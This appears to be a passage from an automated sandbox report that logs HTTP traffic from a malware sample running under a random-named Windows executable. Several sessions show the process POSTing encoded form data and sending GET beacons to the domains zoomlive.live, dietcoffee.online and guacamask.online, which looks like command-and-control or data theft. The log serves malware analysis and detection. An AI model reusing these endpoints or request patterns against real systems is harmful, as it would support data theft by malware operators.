                                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d404 Not Found0


                                                                                Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 50030 | Destination IP: 154.208.202.225 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp: Dec 14, 2024 13:51:39.569766045 CET | Bytes transferred: 1777 | Direction: OUT
                                                                                Data:
                                                                                POST /k6vm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.zoomlive.live
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.zoomlive.live
                                                                                Referer: http://www.zoomlive.live/k6vm/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 53 49 6a 59 51 63 2f 79 6e 43 6a 48 38 69 78 61 39 30 75 5a 64 57 39 44 2b 52 6f 34 50 2b 72 63 76 78 31 50 36 78 2b 38 30 74 46 73 72 65 30 4e 52 58 7a 35 56 4c 58 71 38 6a 79 35 4c 46 4f 53 79 34 43 61 74 59 51 65 6f 46 65 77 76 77 2f 36 41 2f 50 53 52 31 47 5a 38 49 6b 30 79 43 61 6e 34 50 62 50 59 2b 30 35 57 2b 79 53 44 49 72 45 68 6b 78 63 37 72 4c 54 4f 64 6d 69 65 77 6f 62 6c 64 4a 31 31 62 66 6a 78 6d 5a 48 32 35 72 4f 49 65 41 42 48 71 33 44 49 43 6d 47 4b 2f 4c 76 6b 2b 71 58 52 38 41 30 4f 54 4c 47 32 58 56 4c 62 38 52 5a 67 51 5a 70 57 58 77 32 61 72 4f 48 4b 42 74 56 4a 5a 78 65 34 6f 50 75 64 33 37 74 36 57 64 42 64 79 45 65 50 35 6f 68 6e 47 58 31 64 4c 79 2b 6e 5a 67 33 39 34 7a 64 77 73 2b 46 67 56 30 77 56 39 62 69 54 62 51 52 78 32 59 38 44 4d 35 30 4e 4c 52 45 4c 6b 61 35 69 6f 55 63 46 4d 36 6a 6c 35 59 6c 6f 34 4c 6d 49 6f 70 43 6d 71 55 2b 73 4e 52 66 56 71 37 49 64 66 46 33 55 61 49 31 4a 38 43 65 41 6c 42 6e 4b 30 46 61 4a [TRUNCATED]
                                                                                Data Ascii: NVK8= [TRUNCATED]
                                                                                Timestamp: Dec 14, 2024 13:51:41.123873949 CET | Bytes transferred: 190 | Direction: IN
                                                                                Data:
                                                                                HTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:55:39 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d404 Not Found0


                                                                                Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 50031 | Destination IP: 154.208.202.225 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp: Dec 14, 2024 13:51:42.245107889 CET | Bytes transferred: 482 | Direction: OUT
                                                                                Data:
                                                                                GET /k6vm/?NVK8=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEn81f5kD6IPefKaW6E3aQWqTb4uuDSc/wDXdngD5uc1XtZiQ==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.zoomlive.live
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Timestamp: Dec 14, 2024 13:51:44.674135923 CET | Bytes transferred: 180 | Direction: IN
                                                                                Data:
                                                                                HTTP/1.1 503 Service Unavailable
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:55:43 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 50032 | Destination IP: 77.68.64.45 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp: Dec 14, 2024 13:51:50.466197014 CET | Bytes transferred: 752 | Direction: OUT
                                                                                Data:
                                                                                POST /725g/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dietcoffee.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.dietcoffee.online
                                                                                Referer: http://www.dietcoffee.online/725g/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 48 50 41 71 7a 4b 4c 68 43 58 50 42 59 75 67 43 56 62 46 42 42 68 6c 65 32 76 4b 63 38 77 45 57 66 35 62 50 61 76 61 34 71 79 41 4d 57 6f 65 75 73 78 4a 6f 7a 6b 65 78 6d 79 6c 6b 49 4f 43 59 50 32 31 30 6d 56 58 41 6d 30 49 79 6e 39 79 74 71 30 34 55 6c 33 62 6c 2f 37 30 2b 75 79 4f 4b 32 59 4e 7a 4a 31 46 45 6d 77 36 77 32 52 31 79 68 4d 31 62 59 54 68 47 6f 31 52 78 57 71 5a 68 4e 37 56 41 75 57 46 71 74 6b 59 4c 79 6c 68 66 58 72 41 53 5a 52 59 47 36 34 35 42 30 59 48 41 4b 74 62 4a 47 4d 74 64 76 32 53 67 65 59 35 68 73 4a 32 74 54 46 4b 4b 77 71 4d 3d
                                                                                Data Ascii: NVK8=jgo+nmRTntVNHPAqzKLhCXPBYugCVbFBBhle2vKc8wEWf5bPava4qyAMWoeusxJozkexmylkIOCYP210mVXAm0Iyn9ytq04Ul3bl/70+uyOK2YNzJ1FEmw6w2R1yhM1bYThGo1RxWqZhN7VAuWFqtkYLylhfXrASZRYG645B0YHAKtbJGMtdv2SgeY5hsJ2tTFKKwqM=
                                                                                Timestamp: Dec 14, 2024 13:51:51.687136889 CET | Bytes transferred: 393 | Direction: IN
                                                                                Data:
                                                                                HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.25.3
                                                                                Date: Sat, 14 Dec 2024 12:51:51 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                                Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 50033 | Destination IP: 77.68.64.45 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp: Dec 14, 2024 13:51:53.316035986 CET | Bytes transferred: 772 | Direction: OUT
                                                                                Data:
                                                                                POST /725g/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dietcoffee.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.dietcoffee.online
                                                                                Referer: http://www.dietcoffee.online/725g/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 56 2f 77 71 32 6f 6a 68 45 33 50 43 58 4f 67 43 62 37 46 46 42 68 70 65 32 75 4f 32 39 46 63 57 52 38 6e 50 62 75 61 34 70 79 41 4d 65 49 65 68 69 52 49 6b 7a 6b 43 44 6d 7a 70 6b 49 4f 47 59 50 33 46 30 6d 6b 58 42 6d 6b 49 30 72 64 79 76 6c 55 34 55 6c 33 62 6c 2f 37 77 45 75 79 57 4b 32 6f 39 7a 49 55 46 48 76 51 36 33 78 52 31 79 71 73 31 58 59 54 67 6a 6f 77 78 66 57 73 64 68 4e 37 6c 41 33 6e 46 74 6e 6b 59 46 2f 46 67 32 62 36 70 67 54 67 59 68 31 72 30 63 69 35 76 31 50 62 71 6a 63 75 6c 31 38 57 2b 59 4f 4c 78 57 39 35 58 45 4a 6d 61 36 75 39 5a 47 50 4f 52 70 6a 6f 6b 6b 43 33 59 59 79 79 42 37 78 67 65 49
                                                                                Data Ascii: NVK8=jgo+nmRTntVNV/wq2ojhE3PCXOgCb7FFBhpe2uO29FcWR8nPbua4pyAMeIehiRIkzkCDmzpkIOGYP3F0mkXBmkI0rdyvlU4Ul3bl/7wEuyWK2o9zIUFHvQ63xR1yqs1XYTgjowxfWsdhN7lA3nFtnkYF/Fg2b6pgTgYh1r0ci5v1Pbqjcul18W+YOLxW95XEJma6u9ZGPORpjokkC3YYyyB7xgeI
                                                                                Timestamp: Dec 14, 2024 13:51:54.365017891 CET | Bytes transferred: 393 | Direction: IN
                                                                                Data:
                                                                                HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.25.3
                                                                                Date: Sat, 14 Dec 2024 12:51:54 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                                Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 50034 | Destination IP: 77.68.64.45 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp: Dec 14, 2024 13:51:56.000159979 CET | Bytes transferred: 1789 | Direction: OUT
                                                                                Data:
                                                                                POST /725g/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dietcoffee.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.dietcoffee.online
                                                                                Referer: http://www.dietcoffee.online/725g/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 56 2f 77 71 32 6f 6a 68 45 33 50 43 58 4f 67 43 62 37 46 46 42 68 70 65 32 75 4f 32 39 46 55 57 52 4f 66 50 64 4e 79 34 6f 79 41 4d 55 6f 65 69 69 52 49 74 7a 6b 4b 48 6d 7a 31 30 49 4e 75 59 50 52 5a 30 67 51 44 42 7a 55 49 30 6a 39 79 73 71 30 35 57 6c 33 4c 70 2f 37 67 45 75 79 57 4b 32 75 35 7a 59 31 46 48 70 51 36 77 32 52 31 75 68 4d 30 49 59 54 34 56 6f 77 46 68 58 63 39 68 4e 66 42 41 73 31 74 74 72 6b 59 48 73 31 67 75 62 36 31 37 54 67 45 36 31 71 77 32 69 36 2f 31 4e 74 62 34 48 66 45 69 67 45 65 68 45 63 70 53 6e 66 6e 38 44 45 61 70 72 75 35 37 49 39 34 47 6f 64 63 6f 48 6c 4e 56 70 6b 30 30 68 45 7a 68 64 71 73 51 49 4f 52 41 53 43 72 78 44 47 48 6d 63 76 33 30 46 4e 4e 52 76 35 45 36 62 56 54 46 49 73 71 72 6c 74 58 77 41 43 59 34 6d 53 58 78 41 71 41 53 7a 34 4f 2f 39 50 44 46 6c 77 2f 66 4c 46 35 50 5a 62 77 79 59 2b 6d 70 6d 65 2b 69 57 42 73 77 71 70 4b 4b 32 46 39 53 63 50 32 62 37 4b 42 4b 35 44 4f 33 41 6d 46 32 71 73 59 51 54 [TRUNCATED]
                                                                                Data Ascii: NVK8= [TRUNCATED]
                                                                                Timestamp: Dec 14, 2024 13:51:57.217530966 CET | Bytes transferred: 393 | Direction: IN
                                                                                Data:
                                                                                HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.25.3
                                                                                Date: Sat, 14 Dec 2024 12:51:57 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                                Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 50035 | Destination IP: 77.68.64.45 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp: Dec 14, 2024 13:51:58.653287888 CET | Bytes transferred: 486 | Direction: OUT
                                                                                Data:
                                                                                GET /725g/?NVK8=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGwDQIl+yrmVlx7FOU7ZgH2yDrtJhtO3pBjm+x7Tk1qeJTKw==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.dietcoffee.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Timestamp: Dec 14, 2024 13:51:59.883641958 CET | Bytes transferred: 373 | Direction: IN
                                                                                Data:
                                                                                HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.25.3
                                                                                Date: Sat, 14 Dec 2024 12:51:59 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 32 35 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>


                                                                                Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 50038 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp: Dec 14, 2024 13:52:06.290647984 CET | Bytes transferred: 749 | Direction: OUT
                                                                                Data:
                                                                                POST /v2ut/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.guacamask.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.guacamask.online
                                                                                Referer: http://www.guacamask.online/v2ut/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 73 6c 5a 5a 76 78 61 2f 31 43 73 49 62 2b 42 72 30 2b 4e 56 37 67 77 64 74 71 4f 2f 42 4a 57 59 48 4b 49 4e 30 62 47 56 77 62 36 62 62 34 2b 62 75 34 46 55 2b 5a 50 7a 6f 4c 39 7a 34 70 4a 6a 4b 71 75 35 76 31 46 72 41 55 6c 35 69 73 79 43 4b 58 38 50 75 41 48 31 39 39 53 55 49 4e 72 41 42 37 39 61 50 45 56 53 43 78 6f 62 79 52 4c 32 38 37 4e 37 4c 7a 78 41 2b 6e 42 36 48 50 53 7a 4d 2f 64 56 69 4d 77 4f 31 33 56 4a 52 71 51 4e 2f 42 41 71 2b 64 6a 6c 39 71 4c 49 42 6b 65 45 6e 4e 52 49 33 4d 63 54 31 43 2f 72 65 64 2f 2b 44 79 48 2f 47 46 54 59 37 44 4d 3d
                                                                                Data Ascii: NVK8=cwNQIXCQp2K9slZZvxa/1CsIb+Br0+NV7gwdtqO/BJWYHKIN0bGVwb6bb4+bu4FU+ZPzoL9z4pJjKqu5v1FrAUl5isyCKX8PuAH199SUINrAB79aPEVSCxobyRL287N7LzxA+nB6HPSzM/dViMwO13VJRqQN/BAq+djl9qLIBkeEnNRI3McT1C/red/+DyH/GFTY7DM=


                                                                                Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 50039 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp: Dec 14, 2024 13:52:09.102816105 CET | Bytes transferred: 769 | Direction: OUT
                                                                                Data:
                                                                                POST /v2ut/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.guacamask.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.guacamask.online
                                                                                Referer: http://www.guacamask.online/v2ut/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 75 47 52 5a 70 53 79 2f 2b 43 73 4c 48 4f 42 72 39 65 4d 63 37 67 4d 64 74 6f 6a 6b 41 39 36 59 4a 49 41 4e 33 61 47 56 6a 72 36 62 51 59 2b 61 71 34 46 62 2b 5a 43 4d 6f 4f 64 7a 34 70 64 6a 4b 6f 47 35 76 45 46 30 41 45 6c 42 76 4d 79 4d 4a 6e 38 50 75 41 48 31 39 35 37 4a 49 4d 50 41 42 4f 74 61 4e 6c 56 52 42 78 6f 63 6c 68 4c 32 34 37 4e 2f 4c 7a 78 69 2b 69 5a 55 48 4e 36 7a 4d 2b 74 56 6c 66 6f 4e 69 48 56 4c 63 4b 52 6b 79 44 67 6b 79 64 37 66 36 49 54 49 52 6b 43 39 6d 37 67 69 74 75 55 37 6d 69 54 54 4f 4f 33 4a 53 43 6d 57 63 6d 44 6f 6c 55 5a 64 63 46 39 52 36 72 47 6d 72 36 61 66 6a 55 77 37 64 51 57 6e
                                                                                Data Ascii: NVK8=cwNQIXCQp2K9uGRZpSy/+CsLHOBr9eMc7gMdtojkA96YJIAN3aGVjr6bQY+aq4Fb+ZCMoOdz4pdjKoG5vEF0AElBvMyMJn8PuAH1957JIMPABOtaNlVRBxoclhL247N/Lzxi+iZUHN6zM+tVlfoNiHVLcKRkyDgkyd7f6ITIRkC9m7gituU7miTTOO3JSCmWcmDolUZdcF9R6rGmr6afjUw7dQWn


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                31 | 192.168.2.5 | 50040 | 208.91.197.27 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:52:11.848484039 CET | 1786 | OUT | POST /v2ut/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.guacamask.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.guacamask.online
                                                                                Referer: http://www.guacamask.online/v2ut/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 75 47 52 5a 70 53 79 2f 2b 43 73 4c 48 4f 42 72 39 65 4d 63 37 67 4d 64 74 6f 6a 6b 41 39 79 59 4a 36 34 4e 30 39 53 56 67 72 36 62 54 59 2b 66 71 34 46 38 2b 5a 4c 46 6f 4f 5a 6a 34 71 6c 6a 4d 4c 2b 35 70 77 70 30 4c 45 6c 42 77 63 79 4e 4b 58 38 47 75 47 6e 35 39 39 66 4a 49 4d 50 41 42 4a 56 61 44 6b 56 52 48 78 6f 62 79 52 4c 71 38 37 4e 62 4c 7a 6f 64 2b 6a 4a 71 48 39 61 7a 4e 65 39 56 67 74 77 4e 2b 58 56 7a 66 4b 52 38 79 44 74 6d 79 64 57 6b 36 4a 32 74 52 6d 43 39 72 76 56 2f 39 71 45 55 39 52 76 46 63 50 76 4f 49 6b 4f 32 57 32 7a 76 75 54 4a 37 52 6b 68 34 31 62 43 69 6a 6f 37 33 31 41 4d 4d 4e 32 44 78 56 49 75 35 70 38 48 47 6e 2b 4f 66 56 4a 63 6f 61 36 72 41 4a 63 2b 42 6b 57 7a 33 4a 73 56 71 75 4b 42 68 44 6f 52 6e 70 6d 47 53 73 37 4f 4c 77 6a 4f 78 75 56 75 6d 47 5a 6d 39 69 46 48 63 57 2f 75 34 6b 59 43 77 47 57 62 73 55 54 68 38 4e 71 56 30 42 74 64 46 6d 50 37 61 75 4d 7a 32 6f 6c 57 6a 6a 72 68 58 47 70 78 38 35 46 53 35 50 [TRUNCATED]
                                                                                Data Ascii: NVK8= [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                32 | 192.168.2.5 | 50041 | 208.91.197.27 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:52:14.525094986 CET | 485 | OUT | GET /v2ut/?NVK8=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLbDhgs8DELm8MllGE9YflG7OlToR8O0B4KwAawBiq2KURdg==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.guacamask.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:52:15.990859032 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:52:15 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
